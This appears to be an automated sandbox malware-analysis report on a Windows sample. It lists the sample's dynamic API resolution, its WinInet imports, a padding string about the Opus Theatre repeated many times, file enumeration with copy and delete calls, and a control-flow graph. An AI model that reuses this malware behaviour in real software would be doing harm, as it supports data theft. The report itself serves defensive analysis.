                                                                                                                                              • LoadLibraryA.KERNEL32(0099FDC0,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A35E
                                                                                                                                              • LoadLibraryA.KERNEL32(0099FCD0,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A370
                                                                                                                                              • LoadLibraryA.KERNEL32(0099FCE8,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A382
                                                                                                                                              • LoadLibraryA.KERNEL32(0099FDD8,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A393
                                                                                                                                              • LoadLibraryA.KERNEL32(0099FC70,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3A5
                                                                                                                                              • LoadLibraryA.KERNEL32(0099FC88,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3B7
                                                                                                                                              • LoadLibraryA.KERNEL32(0099FE20,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3C8
                                                                                                                                              • GetProcAddress.KERNEL32(75290000,009961D8), ref: 0041A3EA
                                                                                                                                              • GetProcAddress.KERNEL32(75290000,0099FEC8), ref: 0041A402
                                                                                                                                              • GetProcAddress.KERNEL32(75290000,00999780), ref: 0041A41A
                                                                                                                                              • GetProcAddress.KERNEL32(75290000,0099FEE0), ref: 0041A433
                                                                                                                                              • GetProcAddress.KERNEL32(75290000,00996338), ref: 0041A44B
                                                                                                                                              • GetProcAddress.KERNEL32(73440000,0099C138), ref: 0041A470
                                                                                                                                              • GetProcAddress.KERNEL32(73440000,009962B8), ref: 0041A489
                                                                                                                                              • GetProcAddress.KERNEL32(73440000,0099BE90), ref: 0041A4A1
                                                                                                                                              • GetProcAddress.KERNEL32(73440000,0099FCA0), ref: 0041A4B9
                                                                                                                                              • GetProcAddress.KERNEL32(73440000,0099FE38), ref: 0041A4D2
                                                                                                                                              • GetProcAddress.KERNEL32(73440000,00996398), ref: 0041A4EA
                                                                                                                                              • GetProcAddress.KERNEL32(73440000,00996278), ref: 0041A502
                                                                                                                                              • GetProcAddress.KERNEL32(73440000,0099FC10), ref: 0041A51B
                                                                                                                                              • GetProcAddress.KERNEL32(752C0000,00996378), ref: 0041A53C
                                                                                                                                              • GetProcAddress.KERNEL32(752C0000,009962F8), ref: 0041A554
                                                                                                                                              • GetProcAddress.KERNEL32(752C0000,0099FCB8), ref: 0041A56D
                                                                                                                                              • GetProcAddress.KERNEL32(752C0000,0099FD00), ref: 0041A585
                                                                                                                                              • GetProcAddress.KERNEL32(752C0000,009963D8), ref: 0041A59D
                                                                                                                                              • GetProcAddress.KERNEL32(74EC0000,0099BE40), ref: 0041A5C3
                                                                                                                                              • GetProcAddress.KERNEL32(74EC0000,0099BFD0), ref: 0041A5DB
                                                                                                                                              • GetProcAddress.KERNEL32(74EC0000,0099FF88), ref: 0041A5F3
                                                                                                                                              • GetProcAddress.KERNEL32(74EC0000,00996158), ref: 0041A60C
                                                                                                                                              • GetProcAddress.KERNEL32(74EC0000,00996318), ref: 0041A624
                                                                                                                                              • GetProcAddress.KERNEL32(74EC0000,0099BFF8), ref: 0041A63C
                                                                                                                                              • GetProcAddress.KERNEL32(75BD0000,0099FF58), ref: 0041A662
                                                                                                                                              • GetProcAddress.KERNEL32(75BD0000,00996258), ref: 0041A67A
                                                                                                                                              • GetProcAddress.KERNEL32(75BD0000,009996A0), ref: 0041A692
                                                                                                                                              • GetProcAddress.KERNEL32(75BD0000,0099FF70), ref: 0041A6AB
                                                                                                                                              • GetProcAddress.KERNEL32(75BD0000,0099FFA0), ref: 0041A6C3
                                                                                                                                              • GetProcAddress.KERNEL32(75BD0000,00996358), ref: 0041A6DB
                                                                                                                                              • GetProcAddress.KERNEL32(75BD0000,00996118), ref: 0041A6F4
                                                                                                                                              • GetProcAddress.KERNEL32(75BD0000,0099FFB8), ref: 0041A70C
                                                                                                                                              • GetProcAddress.KERNEL32(75BD0000,0099FEF8), ref: 0041A724
                                                                                                                                              • GetProcAddress.KERNEL32(75A70000,00996178), ref: 0041A746
                                                                                                                                              • GetProcAddress.KERNEL32(75A70000,0099FF10), ref: 0041A75E
                                                                                                                                              • GetProcAddress.KERNEL32(75A70000,0099FF28), ref: 0041A776
                                                                                                                                              • GetProcAddress.KERNEL32(75A70000,0099FF40), ref: 0041A78F
                                                                                                                                              • GetProcAddress.KERNEL32(75A70000,009A0150), ref: 0041A7A7
                                                                                                                                              • GetProcAddress.KERNEL32(75450000,009963B8), ref: 0041A7C8
                                                                                                                                              • GetProcAddress.KERNEL32(75450000,009963F8), ref: 0041A7E1
                                                                                                                                              • GetProcAddress.KERNEL32(75DA0000,00996198), ref: 0041A802
                                                                                                                                              • GetProcAddress.KERNEL32(75DA0000,009A0270), ref: 0041A81A
                                                                                                                                              • GetProcAddress.KERNEL32(6F070000,00996418), ref: 0041A840
                                                                                                                                              • GetProcAddress.KERNEL32(6F070000,009961B8), ref: 0041A858
                                                                                                                                              • GetProcAddress.KERNEL32(6F070000,00996478), ref: 0041A870
                                                                                                                                              • GetProcAddress.KERNEL32(6F070000,009A0288), ref: 0041A889
                                                                                                                                              • GetProcAddress.KERNEL32(6F070000,009961F8), ref: 0041A8A1
                                                                                                                                              • GetProcAddress.KERNEL32(6F070000,00996438), ref: 0041A8B9
                                                                                                                                              • GetProcAddress.KERNEL32(6F070000,009962D8), ref: 0041A8D2
                                                                                                                                              • GetProcAddress.KERNEL32(6F070000,00996458), ref: 0041A8EA
                                                                                                                                              • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0041A901
                                                                                                                                              • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0041A917
                                                                                                                                              • GetProcAddress.KERNEL32(75AF0000,009A02A0), ref: 0041A939
                                                                                                                                              • GetProcAddress.KERNEL32(75AF0000,009995D0), ref: 0041A951
                                                                                                                                              • GetProcAddress.KERNEL32(75AF0000,009A0120), ref: 0041A969
                                                                                                                                              • GetProcAddress.KERNEL32(75AF0000,009A0210), ref: 0041A982
                                                                                                                                              • GetProcAddress.KERNEL32(75D90000,00996218), ref: 0041A9A3
                                                                                                                                              • GetProcAddress.KERNEL32(6D0C0000,009A01B0), ref: 0041A9C4
                                                                                                                                              • GetProcAddress.KERNEL32(6D0C0000,00996238), ref: 0041A9DD
                                                                                                                                              • GetProcAddress.KERNEL32(6D0C0000,009A0198), ref: 0041A9F5
                                                                                                                                              • GetProcAddress.KERNEL32(6D0C0000,009A0138), ref: 0041AA0D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                                                                              • String ID: HttpQueryInfoA$InternetSetOptionA
                                                                                                                                              • API String ID: 2238633743-1775429166
                                                                                                                                              • Opcode ID: 20b608565022329c8e522603aeb206678cdaef6a3851366fd54475d7f707e8f0
                                                                                                                                              • Instruction ID: fc853244e6edf76f870e234c3061c456cb9d9aaab695e8dd72f65461d71d1d70
                                                                                                                                              • Opcode Fuzzy Hash: 20b608565022329c8e522603aeb206678cdaef6a3851366fd54475d7f707e8f0
                                                                                                                                              • Instruction Fuzzy Hash: 98623EB5D1B2549FC344DFA8FC8895677BBA78D301318A61BF909C3674E734A640CB62
                                                                                                                                              Function 00404610 Relevance: 112.1, APIs: 34, Strings: 30, Instructions: 114stringmemoryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040461C
                                                                                                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404627
                                                                                                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404632
                                                                                                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040463D
                                                                                                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404648
                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,00416C9B), ref: 00404657
                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,00416C9B), ref: 0040465E
                                                                                                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040466C
                                                                                                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404677
                                                                                                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404682
                                                                                                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040468D
                                                                                                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404698
                                                                                                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046AC
                                                                                                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046B7
                                                                                                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046C2
                                                                                                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046CD
                                                                                                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046D8
                                                                                                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404701
                                                                                                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040470C
                                                                                                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404717
                                                                                                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404722
                                                                                                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472D
                                                                                                                                              • strlen.MSVCRT ref: 00404740
                                                                                                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404768
                                                                                                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404773
                                                                                                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040477E
                                                                                                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404789
                                                                                                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404794
                                                                                                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047A4
                                                                                                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047AF
                                                                                                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047BA
                                                                                                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047C5
                                                                                                                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047D0
                                                                                                                                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 004047EC
                                                                                                                                              Strings
                                                                                                                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404688
                                                                                                                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B2
                                                                                                                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404763
                                                                                                                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404667
                                                                                                                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404779
                                                                                                                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404712
                                                                                                                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404707
                                                                                                                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046A7
                                                                                                                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047CB
                                                                                                                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404784
                                                                                                                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                                                                                                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047AA
                                                                                                                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                                                                                                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                                                                                                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046FC
                                                                                                                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040467D
                                                                                                                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040479F
                                                                                                                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471D
                                                                                                                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404728
                                                                                                                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C8
                                                                                                                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040478F
                                                                                                                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404672
                                                                                                                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D3
                                                                                                                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047B5
                                                                                                                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047C0
                                                                                                                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404693
                                                                                                                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040476E
                                                                                                                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                                                                                                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046BD
                                                                                                                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                                                                                                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                                                                                                                              • API String ID: 2127927946-2218711628
                                                                                                                                              • Opcode ID: 17b32a439cbe3e0ae32343c02b1fa56e4c99a47b2d8951fd533b5c970d2f3f07
                                                                                                                                              • Instruction ID: 994efd3a0b10ceab7f5143b43c992d696de16e9dedea517f3aaaefbefb2e1973
                                                                                                                                              • Opcode Fuzzy Hash: 17b32a439cbe3e0ae32343c02b1fa56e4c99a47b2d8951fd533b5c970d2f3f07
                                                                                                                                              • Instruction Fuzzy Hash: F0413F79740624ABD7109FE5FC4DADCBF70AB4C702BA08061F90A99190C7F993859B7D
                                                                                                                                              Function 0040BE40 Relevance: 63.7, APIs: 29, Strings: 7, Instructions: 727fileCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 960 40be40-40bed2 call 41aa50 call 41ac30 call 41acc0 call 41abb0 call 41ab10 * 2 call 41aa50 * 2 call 41ade0 FindFirstFileA 979 40bed4-40bf22 call 41ab10 * 6 call 401550 call 41ab10 * 2 960->979 980 40bf27-40bf3b StrCmpCA 960->980 1035 40c90f-40c912 979->1035 981 40bf53 980->981 982 40bf3d-40bf51 StrCmpCA 980->982 984 40c89e-40c8b1 FindNextFileA 981->984 982->981 985 40bf58-40bfd1 call 41ab30 call 41ac30 call 41acc0 * 2 call 41abb0 call 41ab10 * 3 982->985 984->980 989 40c8b7-40c8c4 FindClose call 41ab10 984->989 1036 40c062-40c0e3 call 41acc0 * 4 call 41abb0 call 41ab10 * 4 985->1036 1037 40bfd7-40c05d call 41acc0 * 4 call 41abb0 call 41ab10 * 4 985->1037 995 40c8c9-40c90a call 41ab10 * 5 call 401550 call 41ab10 * 2 989->995 995->1035 1075 40c0e8-40c0fe call 41ade0 StrCmpCA 1036->1075 1037->1075 1078 40c104-40c118 StrCmpCA 1075->1078 1079 40c2c5-40c2db StrCmpCA 1075->1079 1078->1079 1082 40c11e-40c238 call 41aa50 call 418cf0 call 41acc0 call 41ac30 call 41abb0 call 41ab10 * 3 call 41ade0 * 2 CopyFileA call 41aa50 call 41acc0 * 2 call 41abb0 call 41ab10 * 2 call 41aab0 call 40a110 1078->1082 1080 40c330-40c346 StrCmpCA 1079->1080 1081 40c2dd-40c320 call 401590 call 41aab0 * 3 call 40a990 1079->1081 1083 40c40a-40c422 call 41aab0 call 418f20 1080->1083 1084 40c34c-40c363 call 41ade0 StrCmpCA 1080->1084 1148 40c325-40c32b 1081->1148 1246 40c287-40c2c0 call 41ade0 DeleteFileA call 41ad50 call 41ade0 call 41ab10 * 2 1082->1246 1247 40c23a-40c282 call 41aab0 call 401590 call 4153e0 call 41ab10 1082->1247 1109 40c428-40c42f 1083->1109 1110 40c58a-40c59f StrCmpCA 1083->1110 1096 40c405 1084->1096 1097 40c369-40c3ff memset call 41ade0 lstrcatA call 41ade0 lstrcatA * 2 call 41ade0 * 3 call 401590 call 409e30 1084->1097 1102 40c7fe-40c807 1096->1102 